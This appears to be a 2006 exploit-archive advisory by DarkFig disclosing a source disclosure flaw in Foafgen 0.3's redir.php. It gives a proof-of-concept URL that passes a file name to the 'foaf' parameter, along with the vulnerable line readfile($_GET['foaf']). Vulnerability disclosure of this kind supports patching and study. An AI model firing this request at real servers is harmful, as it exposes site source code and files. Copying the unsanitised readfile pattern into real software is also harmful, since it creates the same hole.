id: 950
date: 10/09/2006
title: Foafgen <= 0.3 (redir.php) Local Source Disclosure Vulnerability
author: DarkFig
cves: 

================================================================
Foafgen <= 0.3 (redir.php) Local Source Disclosure Vulnerability
================================================================



#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#

# Affected.scr: Foafgen v0.3
# Poc.........: http://victim.com/redir.php?foaf=file.php
# Vuln.code...: Line 4, readfile($_GET['foaf']);



#  0day.today [2023-03-25]  #